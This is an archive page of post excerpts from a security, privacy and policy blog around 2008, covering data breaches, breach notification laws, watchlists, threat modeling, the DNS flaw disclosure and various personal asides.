The night of September 29th, I had a room at the Renaissance Amsterdam hotel on Kattengat street. Actually I had two rooms, not that I slept in either of them. The first had too much street noise, and windows that didn’t block out the sound. The second, well, I woke up at 7.30 AM from […]

 

Cheetah Delays Luggage

A cheetah traveling from Oregon to Memphis, Tennessee escaped from its cage on a Delta flight from Portland to Atlanta. Luggage was delayed, a baggage worker got a good fright (oh, yeah, imagine finding a cheetah on Halloween), but no baggage was destroyed. I would like to be able to link to the full story, […]

 

Studs Terkel, 1912-2008

No Chicagoan stood up for the common man like Studs Terkel, although Nelson Algren was probably in the running. A security-related anecdote, courtesy of the Chicago Tribune: In 1997 he went to the White House to receive the National Humanities Medal and the National Medal of Arts with a group including Jason Robards, Angela Lansbury, […]

 

Experience and Decision Making

Following on our satirical endorsement of McCain-Palin yesterday, I’d like to talk a little about the experience argument, that is, that Obama lacks the experience to be President. This may well be true. I’d prefer someone with extensive executive experience, ideally running a state. Experience matters in one very specific way: it may help you […]

 

Responses to Terror: Boston and Ashdod, Israel

An Israeli teenager has been arrested after he donned a mask and prowled the streets of his town with a big rucksack and toy gun for a school project. The boy, 15, was seized by police in the southern town of Ashdod suspecting he was a Palestinian militant. The student was quoted as saying he […]

 

CTOs, Product Management and Program Management

In “The product manager’s lament,” Eric Ries writes about his view of product managers: Let’s start with what the product manager does. He’s supposed to be the person who specifies what the product will do. He writes detailed specs which lay out exactly what features the team should build in its next iteration. These specs […]

 

Ridiculing the Ridiculous: Terrorist Tweets

A group of soldiers with the US Army’s 304th Military Intelligence Battalion have managed to top previous military research on terrorist use of World of Warcraft. Realizing that mentioning the word “terrorist” can allow researchers to acquire funding to play the popular MMOG, they turned attention to the popular, if architecturally unscalable micro-blogging system, Twitter. […]

 

"Secure Flight" now part of the Bush Administration's Legacy

We welcome the Bush administration’s continuing dedication to excellence and security in developing clear and appropriate rules to prevent terrorists from flying: In this respect, there are major discrepancies between the (nonbinding) description at the start of the regulatory notice issued today, and the actual regulations that follow it (the last 20 pages of the […]

 

Buffett Vs Paulson

I was listening to Joseph Stiglitz on NPR this morning, and he had a very interesting comparison. (Quoting from an op-ed in the Guardian): For all the show of toughness, the details suggest the US taxpayer got a raw deal. There is no comparison with the terms that Warren Buffett secured when he provided capital […]

 

The Costs of Secrecy

Security continues to be crippled by a conspiracy of silence. The ongoing costs of not talking about what’s going wrong are absolutely huge, and today, we got insight into just how huge. Richard Clayton and Tyler Moore of Cambridge University have a new paper on phishing, “The consequence of non-cooperation in the fight against phishing.” […]

 

Investing in the finance crisis

The Wall Street domino has toppled just about everything in sight: U.S. stocks large and small, within the financial industry and outside of it; foreign stocks; oil and other commodities; real-estate investment trusts; formerly booming emerging markets like India and China. Even gold, although it has inched up lately, has lost 10% from its highs […]

 

Open thread

What’s on your mind in October?

 

Emergence Emerges

This paper, “More Really is Different,” may be one of the most important papers of the last half-millennium. It argues that P.W. Anderson’s concept of “emergence” is provable. It may have even proved it. The idea of emergence, from whence this blog gets its name, is the opposite of reductionism. It is the idea that […]

 

Death Penalty Protestors are Terrorists

The Washington Post reports upon the further cheapening of the word “terrorism” in, “Md. Police Put Activists’ Names On Terror Lists.” The fifty-three people with “no evidence whatsoever of any involvement in violent crime” who were put on a list of terrorists include anti-death-penalty protestors. It’s really hard to keep from laughing about this. Are […]

 

Identity Manglement

It was Dopplr that drove me over the edge on this rant. I almost feel bad for starting off with them, because as you will see, they’re just the bale of hay that broke the camel’s back. I was updating my travel schedule, which included a trip to St. Louis. It told me that by […]

 

Experiences Threat Modeling at Microsoft

A little bit of cross-pollination between blogs: Adam Shostack here. Last weekend, I was at a Security Modeling Workshop, where I presented a paper on “Experiences Threat Modeling at Microsoft,” which readers of [the Microsoft Security Development Lifecycle] blog might enjoy. So please, enjoy!

 

"No evidence the data was misused"

The next time you read a statement that a breached entity has found no evidence of data misuse, remember this: data may have been misused even though entities are unaware of it. Tim Wilson of Dark Reading provides a current example of why entities should inform customers, this one involving the T-Mobile breach that affected […]

 

Researchers Two-Faced over Facebook Data Release

[Update: Michael Zimmer points out that it wasn’t Facebook, but outside researchers who released the data.] I wanted to comment quickly on an interesting post by Michael Zimmer, “On the “Anonymity” of the Facebook Dataset.” He discusses how A group of researchers have released a dataset of Facebook profile information from a group of […]

 

What's in a name(less)?

Me! I had a great time in a conversation with Dennis Fisher which is now up on his nameless security podcast: Adam Shostack on privacy, data breaches and “The New School of Information Security” Check it out. Update: Amazon seems to be having trouble keeping The New School in stock. (Thank you!!!) Addison Wesley has […]

 

The Skype Issue

According to The New York Times in, “Surveillance of Skype Messages Found in China,” the Chinese provider TOM has software in place that reads Skype text messages, and blocks ones that use naughty words and terms, like “Falun Gong,” “Independent Taiwan,” and so on. A group of security people and human rights workers not only […]

 

Submitted for your consideration

I added Bank Lawyer’s Blog to my set of RSS feeds some time ago, after I came across a decent post about ID theft there. I provide — without comment — the following quotation from a banking industry lawyer, as posted yesterday: Near the end of the Oscar-winning movie “Unforgiven,” the young assassin who calls […]

 

Regulations, Risk and the Meltdown

There are obviously a large set of political questions around the 700+ billion dollars of distressed assets Uncle Sam plans to hold. If you care about the politics, you’re already following in more detail than I’m going to bother providing. I do think that we need to act to stem the crisis, and that we […]

 

Adam on CS TechCast

I did a podcast with Eric and Josh at CS Techcast. It was lots of fun, and is available now: link to the show Welcome to another CSTechcast.com podcast for IT professionals. This week we interview Adam Shostack, author of The New School of Information Security about the essentials IT organizations need to establish to […]

 

And I thought I didn't like Streisand

While Babs’ vocal stylings may be an “acquired taste”, today I have a new appreciation for the Streisand Effect. Thanks to Slashdot, I learned that Thomson Reuters is suing the Commonwealth of Virginia alleging that Zotero, an open-source reference-management add-on for Firefox, contains features resulting from the reverse-engineering of Endnote, a competing commercial reference management […]

 

Blaming the Victim, Yet Again

John Timmer of Ars Technica writes about how we ignore dialog boxes in, “Fake popup study sadly confirms most users are idiots.” The article reports that researchers at the Psychology Department of North Carolina State University created a number of fake dialog boxes that had varying sorts of clues that they were not real dialog boxes, […]

 

2008 Breaches: More or More Reporting?

Dissent has some good coverage of an announcement from the ID Theft Resource Center, “ITRC: Breaches Blast ’07 Record:” With slightly more than four months left to go for 2008, the Identity Theft Resource Center (ITRC) has sent out a press release saying that it has already compiled 449 breaches– more than its total for […]

 

University of Lake Wobegon?

Spaf has an excellent post up about Purdue’s decision to no longer be an NSA Center of Academic Excellence. He makes a number of thought-provoking points, among them that “excellence” loses its meaning if the bar is set too low, and that being an academic center and having a training (as opposed to educating) curriculum […]

 

SDL Press Tour Announcements

Steve Lipner and I were on the road for a press tour last week. In our work blog, he writes: Last week I participated in a “press tour” talking to press and analysts about the evolution of the SDL. Most of our past discussions with press and analysts have centered on folks who follow security, […]

 

Help fund historic computers at Bletchley Park

Bletchley Park, the site in the UK where WWII code-breaking was done, has a computing museum. The showpiece of that museum is Colossus, one of world’s first computers. (If you pick the right set of adjectives, you can say “first.” Those adjectives are apparently, “electronic” and “programmable.”) It has been rebuilt over the last fourteen […]

 

Canadian PM FAIL

Dear Mr Harper, In general people do not care for the government to be tracking their religious affiliation. In particular however, there are few groups who care less for this sort of tracking than Jews. Seriously, you’re not going to get votes by sending Rosh Hashanah cards to your Jewish constituents. It freaks us out, […]

 

Risk Managers Are Just Like Security People

Or is that vice-versa? A few weeks ago, Security Retentive posted about an article in the Economist: “Confessions of a Risk Manager”. Both his analysis and the original story are quite interesting and I encourage you to read them as well as a letter to the editor that was published in last week’s print edition […]

 

Things only An Astrologist Could Believe

There’s a really funny post on a blog titled “Affordable Indian Astrology & Vedic Horoscope Provider:” Such a choice of excellent Muhurta with Chrome release time may be coincidental, but it makes us strongly believe that Google may not have hesitated to utilize the valuable knowledge available in Vedic Astrology in decision making. This is […]

 

Signal Boosting Amrit Williams

File this under “Posts I Wish I’d Written”. Amrit Williams’ “The 7 Greatest Ideas in Security,” really highlights a lot of my basic thoughts on how security should work. His conclusion sums things up cogently, but go read the entire post: Some may argue that something has been forgotten or that the order is […]

 

Lessons for security from "Social Networks"

There are a couple of blog posts that I’ve read lately that link together for me, and I’m still working through the reasons why. I’d love your feedback or thoughts. A blogger by the name of Lhooqtius ov Borg has a long screed on why he doesn’t like the “Social Futilities.” Tyler Cowan has a […]

 
 

TSA Breaks Planes (and a link to infosec)

Aero News Network has a fascinating story, “ANN Special Report: TSA Memo Suggests That Agency ‘Encourages’ Damaging Behavior.” It covers how a TSA goon climbed up a plane using equipment marked “not a handhold,” damaging it and putting the flying public at risk. It continues: While this may be terrifying on a number of levels, […]

 

Diebold/Premier vote dropping

A voting system used in 34 states contains a critical programming error that can cause votes to be dropped while being electronically transferred from memory cards to a central tallying point, the manufacturer acknowledges. The problem was identified after complaints from Ohio elections officials following the March primary there, but the logic error that is […]

 

The Omnivore's Hundred

I find it interesting that security people and foodies are strongly correlated. Or at least are strongly correlated among the ones I know. Very Good Taste has a list of things called The Omnivore’s Hundred, a list of things worth trying, modulo this and that. You mark things you have tried, and mark things you […]

 

Disaster Recovery Drills Aren't Just For IT

The Economist has a short but great overview on crisis management. The article is well worth reading completely, but there is one section that bears highlighting: Be well prepared in advance. Potential members of a crisis management “team” should rehearse how they would manage the impact of an incident. It is a bit like learning […]

 

We're all in it together

Ryan Singel reports at 27B/6: The TSA was keeping the names of people who lost their wallets and needed to fly — even after ascertaining their identity and determining they were not a threat and could board a plane. It stored these names in a shared threat database. Then it decided that it won’t store […]

 

Certifiably Silly

Over at “The Security Practice,” Michael Barrett writes about “Firefox 3.0 and self-signed certificates.” Neither of us is representing our respective employers. …almost everyone who wants to communicate securely using a browser can afford an SSL certificate from CAs such as GoDaddy, Thawte, etc. The cost of single certificates from these sources can only […]

 

That's an address I haven't used in a very long time.

Well, I got a letter from BNY Mellon, explaining that they lost my data. The most interesting thing about it, I think, is where it was sent, which is to my mom. (Hi Mom!) I had thought that I’d moved all of my financial statements to an address of my own more than a decade […]

 

Watchlist Cleaning Law

Former South African President Nelson Mandela is to be removed from U.S. terrorism watch lists under a bill President Bush signed Tuesday… The bill gives the State Department and the Homeland Security Department the authority to waive restrictions against ANC members. This demonstrates that greater scrutiny must be placed on the decisions about who gets […]

 

Instant Ice Age

Science reports in, “The Year the World Froze Over:” It sounds like the stuff of science fiction, but nearly 13 millennia ago Europe was plunged suddenly into a deep freeze that lasted 1300 years–and the change happened in little more than a year, according to new data. The evidence also suggests that strong winds, not […]

 

Black Hat (Live) Blog: Keynote

Ian Angell from the London School of Economics gave a great keynote on complexity in systems and how the desire to categorize, enumerate, and add technology can break things in interesting ways. An example of his: there’s an increasing desire among politicians and law enforcement to create huge DNA databases for forensic purposes, to aid […]

 

Does this mean we can revise our opinion of Friday the 13th?

According to The Daily Telegraph, the Knights Templar are suing the Vatican for all that money they lost in 1307. (The Telegraph has a companion article here as well.) This adds up to a nice round €100 billion. The Telegraph didn’t say whether that is American billions (thousand million, 10⁹) or English billions (million million, […]

 

Cleared Traveler Data Lost

Verified Identity Pass, Inc., who run the Clear service have lost a laptop containing information of 33,000 customers. According to KPIX in “Laptop Discovery May End SFO Security Scare” the “alleged theft of the unencrypted laptop” lost information including names, addresses, birth dates and some applicants’ driver’s license numbers and passport information, but does not […]

 

SOUPS 2008, summarized

I really appreciate the way that Richard Conlan has in-depth blogged all of the sessions from the 2008 Symposium on Usable Privacy and Security. The descriptions of the talks are really helpful in deciding which papers I want to dig into. More conferences should do this. There’s only one request I’d make: There’s no single […]

 

What do you want to know about SDL Threat Modeling?

Over on my work blog, I asked: I’m working on a paper about “Experiences Threat Modeling at Microsoft” for an academic workshop on security modeling. I have some content that I think is pretty good, but I realize that I don’t know all the questions that readers might have. So, what questions should I try […]

 

Call Centers Will Get More Annoying

There’s an article in “destination CRM,” Who’s Really Calling Your Contact Center? …the identity questions are “based on harder-to-steal information” than public records and credit reports. “This is much closer to the chest than a lot of the public data being used in other authentication systems,” she says, adding that some companies using public data […]

 

London’s New Transit Card

Transport for London is trying to get as many people as possible to use Oyster Cards. They are cheaper — and theoretically easier to use — than traditional tube / bus tickets. However, using one means that TfL has a record of your journeys on the transport system, which is something that not everybody is […]

 

Reproducibility, sharing, and data sensitivity

What made this particular work different was that the packets we captured came through a Tor node. Because of this difference, we took extreme caution in managing these traces and have not and will not plan to share them with other researchers. Response to Tor Study I won’t get into parsing what “have not and […]

 

New FISA Analysis

Vox Libertas, a blogger at the Daily Kos has written an analysis of the new US FISA law in his article, “I think I understand the FISA bill. Do I?” Vox Libertas has taken an approach that I can appreciate. On the one hand, many people are unhappy with the telecom immunity. I’m one of […]

 
 

Breaches & Human Rights in Finland

The European Court of Human Rights has ordered the Finnish government to pay out €34,000 because it failed to protect a citizen’s personal data. One data protection expert said that the case creates a vital link between data security and human rights. The Court made its ruling based on Article 8 of the European Convention […]

 

Off to Belgium

I’m getting ready to leave for the 2008 Privacy Enhancing Technologies Symposium. I love this event, and I’m proud to have been involved since Hannes Federrath kicked it off as a workshop on design issues in anonymity and unobservability. I’m also happy that Microsoft has continued to sponsor an award for outstanding research in Privacy Enhancing […]

 

Putting the fun back in threat modeling

I have an article in the latest MSDN magazine, “Reinvigorate your threat modeling process:” My colleague Ellen likes to say that everyone threat models all the time. We all threat model airport security. We all threat model our homes. We think about threats against our assets: our families, our jewelry, and our sentimental and irreplaceable […]

 

Writing a book: The Proposal

To start from the obvious, book publishers are companies, hoping to make money from the books they publish. If you’d like your book to be on this illustrious list, you need an idea for a book that will sell. This post isn’t about how to come up with the idea, it’s about how to sell […]

 

Security & Human Behavior

There’s a huge amount of interesting stuff from a recent workshop on “Security & Human Behavior.” Matt Blaze has audio, and Ross Anderson has text summaries in the comments on his blog post. Also, see Bob Sullivan, “How magic might finally fix your computer”

 

Laptops and border crossings

The New York Times has in an editorial, “The Government and Your Laptop” a plea for Congress to pass a law to ensure that laptops (along with phones, etc.) are not seized at borders without reasonable suspicion. They have the interesting statistic that in a survey by the Association of Corporate Travel Executives, 7 of […]

 

Leveraging Public Data For Competitive Purposes

The Freakonomics blog pretty much says it all: The latest: importgenius.com, the brainchild of brothers Ryan and David Petersen, with Michael Kanko. They exploit customs reporting obligations and Freedom of Information requests to organize and publish — in real-time — the contents of every shipping container entering the United States. From importgenius.com. There’s a neat […]

 

The Recent History of the Future of Cash

Dave Birch has a really interesting post about The future of the future of cash: The report also identifies three key attributes of cash that make it — still — the dominant payment system. Universality, trust and anonymity. I’m curious about the location of anonymity in the customer mindset and I’m going to post some […]

 

Richard Feynman and The Connection Machine

There’s a fascinating article at The Long Now Foundation, “Richard Feynman and The Connection Machine,” by Danny Hillis. It’s a fun look into the interactions of two of the most interesting scientist/engineers of the last 40 years.

 

Massive Coordinated Vendor Patch For DNS

Dan “Doxpara” Kaminsky today released information about a fundamental design flaw in the architecture of DNS which if properly exploited would allow a malicious party to impersonate any website they wanted to. This issue affects every single version of DNS. The flaw primarily affects the DNS server but it can also affect clients as well […]

 

Writing a book: technical tools & collaboration

When Andrew and I started writing The New School, we both lived in Atlanta, only a few miles apart. We regularly met for beer or coffee to review drafts. After I moved to Seattle, our working process changed a lot. I wanted to talk both about the tools we used, and our writing process. We […]

 

Maryland Breach Notices

Case Number | Date Received | Business Name | No. of MD residents | Total breach size | Information breached | How breach occurred
153504 | 06/09/08 | Argosy University | | | name, social security number, addresses | Laptop computer stolen from employee of SunGard Higher Education
Maryland Information Security Breach Notices are put online by the most forward-looking Douglas F. Gansler, attorney general. I’m glad […]

 

Freakonomics and Data

There’s a really interesting article in the New Republic, “Freaks and Geeks:” In 2000, a Harvard professor named Caroline Hoxby discovered that streams had often formed boundaries to nineteenth-century school districts, so that cities with more streams historically had more school districts, even if some districts had later merged. The discovery allowed Hoxby to show […]

 

On Banking Security

Dave Maynor comments: Blizzard is going to sell a One Time Password device…Isn’t it kind of funny when an online game has better security than most banks? Blizzard Entertainment, Inc. today introduced an optional extra layer of security for World of Warcraft®, its award-winning massively multiplayer online role-playing game. Designed to attach to a keychain, […]

 

Sounds Like — Chomsky

The New Scientist reports that “Charades reveals a universal sentence structure.” Susan Goldin-Meadow, a linguistic psychologist at the University of Chicago, led a team that found that speakers of most languages use the same simple sentence structure when miming, regardless of the structure of the language they speak. A demonstration movie is here. That structure […]

 

Study: Firefox patched quickest, IE a laggard

A new technical report out of ETH Zurich, Understanding the Web browser threat, should appeal to EC readers. The authors were granted access to the USER-AGENT information recorded globally by Google between January 2007 and June 2008. By examining the first visit per day by each browser, the authors are able to determine which clients were […]

 
 

Network Security Podcast #109, featuring Adam

I’m the guest on the latest episode of Martin McKeay and Rich Mogull’s Network Security podcast. It was a lot of fun to record, I hope you enjoy listening to it. [Link fixed.]

 

Game Theory and Poe

Julie Rehmeyer of Science News writes in, “The Tell-Tale Anecdote: An Edgar Allan Poe story reveals a flaw in game theory” about a paper Kfir Eliaz and Ariel Rubinstein called, “Edgar Allan Poe’s Riddle: Do Guessers Outperform Misleaders in a Repeated Matching Pennies Game?” The paper discusses a game that Poe describes in The Purloined […]

 

Not quite clear on the subject

Slyck News has a story, “SSL Encryption Coming to The Pirate Bay” a good summary of which is in the headline. However, it may not help, and may hurt. Slyck says: The level of protection offered likely varies on the individual’s geographical location. Since The Pirate Bay isn’t actually situated in Sweden, a user in the […]

 
 

Science isn't about Checklists

Over at Zero in a Bit, Chris Eng has a post, “Art vs. Science”: A client chastised me once for making a statement that penetration testing is a mixture of art and science. He wanted to believe that it was completely scientific and could be distilled down to a checklist type approach. I explained that […]

 

Water on Mars!

Mars Phoenix Tweets: “We Have ICE!” And yes, they really did announce on Twitter and a press release.

 

Medeco Embraces The Locksport Community

Two days ago, Marc Weber Tobias pointed out that Medeco, the 800 pound gorilla in the high-security lock market, recently published an open letter to the locksport community, welcoming it to the physical security industry: While we have worked with many locksmiths and security specialists in the past to improve our cylinders, this is the […]

 

L'affaire Kozinski

Kim Zetter on Threat Level has written about Larry Lessig’s comments about Judge Alex Kozinski’s problems with having files on a personal server made public. Zetter has asked to hear people’s opinions about the issue. I thought I’d just blog about mine. Basically, I agree with Lessig. The major place that I disagree with Lessig […]

 

Can You Hear Me Now?

Debix, Verizon, the ID Theft Research Center and the Department of Justice have all released really interesting reports in the last few days, and what makes them interesting is their data about what’s going wrong in security. This is new. We don’t have equivalents of the National Crime Victimization Surveys for cyberspace. We don’t have […]

 

Paper Breach

The BBC reports in “Secret terror files left on train” that an … unnamed Cabinet Office employee apparently breached strict security rules when he left the papers on the seat of a train. A fellow passenger spotted the envelope containing the files and gave it to the BBC, who handed them to the police. We […]

 

What’s up with the "New and Used" Pricing on Amazon?

So having a book out, you start to notice all sorts of stuff about how Amazon works. (I’ve confirmed this with other first time authors.) One of the things that I just can’t figure out is the pricing people have for The New School. There’s a new copy for 46.43. A mere 54% premium over […]

 

In the "couldn't have happened to a better set of people" department…

Fifteen people have escaped unharmed in the US state of Indiana after a sky-diving plane lost power 7,000ft (2,100m) from the ground. The pilot told the 14 skydivers on board to jump to safety, then crash-landed the plane. And the pilot was uninjured, according to the AP story. From Skydiving plane fails at 7,000ft, BBC. […]

 

8th Pet Symposium Early Registration Deadline

We kindly invite you to attend the next PET Symposium, that will take place in Leuven (Belgium) on July 23-25, 2008. The PET Symposium is the leading international event for the latest research on privacy and anonymity technologies. This year, four other events are co-located with PETS 2008, including the Workshop On Trustworthy Elections (WOTE […]

 

Open thread

What the heck. Let’s see what happens. Comment on what you will.

 

Because it is the weekend and I am lazy

Chris’s beach reading recommendations:
John Maynard Smith, Evolution and the Theory of Games
James S. Coleman, Foundations of Social Theory
Ken Binmore, Natural Justice

 

Jonathan Ive's Sharia Style

I was on a business commuter flight the other day, which was also the maiden voyage of my MacBook Air. I had it out before takeoff. This was an international flight and I was in bulkhead. On international flights, they’re not as strict about not having your laptop on your lap during takeoff. This flight […]

 

Does the UK need a breach notice law?

Chris Pounder has an article on the subject: In summary, most of the important features of USA-style, security breach notification law are now embedded into the guiding Principles of the Data Protection Act. Organisations risk being fined if they carelessly lose personal data or fail to encrypt personal data when they should have done. Individuals […]

 

Why the heck don't I ever have ideas this good?

Walkscore.com. Calculates a location’s “walkability” by using Google Maps to figure out how close various amenities (such as grocery stores, public transit, parks, etc.) are. Not a perfect service, but a great idea.

 

Sing it shrdlu

Over at Layer8, shrdlu lays it out there and tells us what it takes to appear to be effective: In all the initiatives I’ve rolled out in my (checkered) career, the ones that have gotten the most acclaim from my management have always been the ones that were most visible to the users. They turned […]

 

New School Reviews

Don Morrill, IT Toolbox: If you want to read a book that will have an influence on your information security career, or if you just want to read something that points out that we do need to do information security differently, then you need to go pick up a copy of “The new school of […]

 

"The Black Hat Tax?" Show me the money

A number of people have sent me links to “Black Hat Tariffs – The Black Hat Taxes on consumer Internet companies are on the rise:” In May 2006, I made mention of the Black Hat Tax, in which most consumer Internet sites have an inherent time, resource, and mindshare tax of roughly 25% due to […]

 

Apparently The State Department Didn’t Learn From Regular Passports

The Washington Times reports that the State Department is going to be producing “passport cards” for people who regularly travel by car or boat to/from Canada, Mexico and the Caribbean. About the size of a credit card, the electronic-passport card displays a photo of the user and a radio frequency identification (RFID) chip containing data about […]

 
 

Let's not ask the experts?

Can Sips at Home Prevent Binges? is a fascinating article in the New York Times. It turns out there’s very solid evidence about this: “The best evidence shows that teaching kids to drink responsibly is better than shutting them off entirely from it,” he told me. “You want to introduce your kids to it, and […]

 

Uncle Harold and Open Source

Uncle Harold (not his real name, not our real relationship, and I never even called him “Uncle”) was a cool guy who always fixed his own cars. Most of my life, Uncle Harold has been complaining. It used to be you could actually fix a car. You could put things in, take them out, adjust […]

 

6/16ths of Chileans’ personal information leaked by hacker

A hacker in Chile calling himself the ‘Anonymous Coward’ published confidential data belonging to six million people on the internet. Authorities are investigating the theft of the leaked data, which includes identity card numbers, addresses, telephone numbers, emails and academic records. Chile has a population of about 16 million, so that’s 3/8ths of the country. […]

 

UK Information Commissioner's Office Can Now Fine Your Ass

From the article: The Criminal Justice and Immigration Act has received Royal Assent creating tough new sanctions for the privacy watchdog, the Information Commissioner’s Office (ICO). This new legislation gives the ICO the power to impose substantial fines on organisations that deliberately or recklessly commit serious breaches of the Data Protection Act. It’s about time […]

 

Call me crazy?

There’s an article in the New York Times, “‘Mad Pride’ Fights a Stigma” “It used to be you were labeled with your diagnosis and that was it; you were marginalized,” said Molly Sprengelmeyer, an organizer for the Asheville Radical Mental Health Collective, a mad pride group in North Carolina. “If people found out, it was […]

 

Credit Bureaus and Outsourcing

The “I’ve Been Mugged” blog has a great three part series on outsourcing by credit bureaus: “Is It Wise For Credit Bureaus To Outsource To Foreign Call Center Firms? (Part 1),” “part 2” and “part 3.” He digs deep into how extensively TransUnion outsources, and where. I went looking, and was surprised to see that […]

 

A question of ethics

Various estimates have been made regarding the quantity of personal identifying information which has been exposed by various mechanisms. Obviously, though, we only know about what we can see, so seeing more would make such estimates better. One way to see more would be to look in more places, for example on peer-to-peer file sharing […]

 

Fasilyce, upon Reading

Dear Mr. Banks, Much as I enjoy your work, it is entirely dis-congruous to your readers to insert words known to neither the Oxford English Dictionary nor the internet (as indexed here, here or here) whose meanings are not rapidly comprehensible. Thank you for your future attention to this matter. I remain, etc, etc.

 

Italy Posts Tax Return Data on Official Website

How much do you make? How surprised would you be to learn that your magic number had been posted on the Internet by the government? And that it was not by mistake, as in other recent breaches of privacy. How Much Do You Make? The Nation Already Knows. The data has already been removed from […]

 

Everybody Run, Crispin's Got a Blog

My buddy, collaborator and co-worker Crispin Cowan has started a blog. The first post is “Security Is Simple: Only Use Perfect Software.” [Update: Added a link to Crispin’s home page, because some readers apparently have trouble with a search engine.]

 

Quantum Uncertainty

Technology Review has a pair of articles on D-Wave’s adiabatic quantum computer. Quantum pioneer Seth Lloyd writes in “Riding D-Wave” about quantum computing in general, adiabatic quantum computing, and D-Wave’s efforts to show that they’ve actually built a quantum computer. Linked to that is Scott Aaronson’s article, “Desultory D-Wave,” in which Lloyd’s nail-biting is made […]

 

The messenger is the message

In a blog post entitled “Lending Tree A Little Late In Cutting Off Network Access?”, I read that in the recent Lending Tree breach: several former employees may have helped a handful of mortgage lenders gain access to Lending Tree’s customer information by sharing confidential passwords with the lenders. Later, the author describes “an obvious […]

 

Who Watches the Watchlists?

The idea of “watchlists” has proliferated as part of the War on Terror. There are now more than 63 of them: As part of its regular “risk management” service, which provides screening, tracing, and identity and background checks on potential clients or trading partners, MicroBilt will now offer a “watch list” service that checks these […]

 

5754463f

The ACM has a list of classic computer science works put together based on responses to a survey of the membership. I’m no computer scientist (though I’ve lived with my share…) but I’m shocked that none of Knuth’s works is on this list, even if it is basically a beauty contest.

 

Security Metric?

Ross Anderson has made PDF versions of several chapters of his Security Engineering (second edition) available on-line. The entire first edition has been available for some time. I am sure this second edition will be outstanding. I would rank the first edition as one of the top three technical books I’ve read. It would likely […]

 

Good problems to have

You don’t have much credibility looking for a publisher for a book on rum when you’re sailing in the Caribbean drinking the best rums you can find in the name of research. Most people just didn’t take me seriously that there was even a need for a book on rum. It took quite a while […]

 

University of Miami: Good for the body, bad for the soul?

The University of Miami has chosen to notify 41,000 out of 2.1 million patients whose personal information was exposed when thieves stole backup tapes. The other 2.1 million people, apparently, should be reassured that their personal medical data was stolen, but the University feels it would be hard to read, and well, there’s no financial […]

 

Point Break, Live

The starring role of Johnny Utah is selected from the audience each night, and reads their entire script off of cue-cards. This method manages to capture the rawness of a Keanu Reeves performance even from those who generally think themselves incapable of acting. The fun starts immediately with the “screen test” wherein the volunteer Keanus […]

 

Marty Lederman, on a roll

You see, the CIA apparently uses the less dangerous version of “waterboarding” — not the Spanish Inquisition method, but the technique popularized by the French in Algeria, and by the Khmer Rouge — involving the placing of a cloth or plastic wrap over or in the person’s mouth, and pouring or dripping water onto the […]

 

Microsoft Security Intelligence Report V4

Microsoft Security Intelligence Report (July – December 2007) This volume of the SIR focuses on the second half of the 2007 calendar year (from July through December) and builds upon the data published in the previously released volumes of the SIR. Using data derived from several hundred million Windows users, and some of the busiest […]

 

Quantum Cryptography Broken and Fixed

Researchers at Linköping University in Sweden have found flaws in quantum cryptography. They also supply a fix. The announcement is here; a FAQ is here; full paper is at the IEEE here (but requires an IEEE membership). The announcement says: Jan-Åke Larsson, associate professor of applied mathematics at Linköping University, working with his student Jörgen […]

 

WEIS 2008: Register now

Registration is under way for the seventh Workshop on the Economics of Information Security, hosted by the Center for Digital Strategies at Dartmouth’s Tuck School of Business June 25-28, 2008 The call for papers, and archives of past workshops give a good sense of what you’ll find (and it is awesome and well worth […]

 

Edward Lorenz, 1917-2008

Edward Lorenz, most famous for research concerning the sensitivity of high-level outcomes to seemingly insubstantial variations in initial conditions (the so-called “butterfly effect”), died April 16 in Cambridge, Massachusetts. Much more information concerning Lorenz’s life and work is available via Wikipedia.

 

Congratulations to the CVE team!

The CVE Web site now contains 30,000 unique information security issues with publicly known names. CVE, which began in 1999 with just 321 common names on the CVE List, is considered the international standard for public software vulnerability names. Information security professionals and product vendors from around the world use CVE Identifiers (CVE-IDs) as a […]

 

Center for Innovative Financial Technology Launches at Berkeley

Congratulations to Berkeley on setting up a “Center for Innovative Financial Technology”, but I wonder why their mission is so conservative? The mission of the Center is to conduct and facilitate innovative research and teaching on how new technologies impact global electronic markets, investment strategies, and the stability of the financial system. The information people […]


Virginia gets it

[…]an individual or entity that owns or licenses computerized data that includes personal information shall disclose any breach of the security of the system following discovery or notification of the breach of the security of the system to the Office of the Attorney General and any affected resident of the Commonwealth without unreasonable delay. Virginia’s […]


Bot construction kit for non-programmers

We all know that ID theft and extortion bots are ubiquitous. Perhaps it is some consolation that a modicum of technical skill is needed to construct such things. That has changed. I (a complete non-programmer) have just built not one but two “bots” using materials available here and here! With these templates, any 8-year-old […]


Privacy Act and "actual damages"

Lauren Gelman writes: I’m breaking blog silence to report on an amazing decision out of the DC Circuit holding that the federal Privacy Act’s requirement that Plaintiffs show actual damages does not require pecuniary harm but can be met by a showing of emotional distress. Am. Fed’n of Gov’t Employees v. Hawley, D.D.C., No. 07-00855, […]


Attrition ends Dataloss — NOT!

UPDATE: This was a belated April Fools’ from the Attrition people, which clearly suckered me in. Attrition.org’s Lyger has announced the end of Attrition’s Dataloss project (presumably including both the DLDOS and Dataloss mailing list). In the past few weeks, it has come to our attention that too many people are more concerned with making […]


41 and counting

Virginia, West Virginia, and South Carolina are the latest states to pass data breach notification laws, bringing to 42 the total number of states with such laws on the books (including the one state with a law that applies only to public entities, Oklahoma). See More Breach Notification Laws — 42 States and Counting at […]


RSA Crazy Busy, book notes

I’m sorry blogging has been light, but RSA has been really busy. I did want to post a quick reminder: I’ll be doing a book singing at 2.30 at the RSA bookstore. PS: I know, that should really say “signing,” not “singing” but I decided I like the typo. If enough people show up and […]


Amazon and The New School

Several of you have mailed or commented about the New School being “delayed” from Amazon. I apologize, this was a surprise to me. What our publisher says: Because of their set-up, Amazon has been taking longer to get a book available for shipping. As you can see this causes problems when they list the pub […]


New School of Information Security: book signing at RSA

I’ll be at RSA next week, and have a book signing scheduled for 2:30 PM Wednesday (April 9) at the RSA bookstore. To be more clear: The RSA bookstore will have copies for sale. I know many of you are waiting for copies. Many of our reviewers emailed me in the last day or two […]


The FDIC's Cyber Fraud Report

The FDIC’s Division of Supervision and Consumer Protection didn’t release a report titled “Cyber Fraud and Financial Crime” on November 9, 2007. That release was left to Brian Krebs, a reporter with the Washington Post, in early March, who blogged about it in “Banks: Losses From Computer Intrusions Up in 2007” and “The FDIC Computer […]


94% of Philippine IT Professionals Endorse Breach Disclosure

“LOCAL SURVEY SHOWS: Private sector wants breach of information systems reported:” MANILA, Philippines — Local organizations want the breach of information systems and theft of personal information reported, a survey conducted by the Cyberspace Policy Center for Asia Pacific (CPCAP) showed. “A surprising 94 percent favored the imposition by law of [an] obligation upon […]


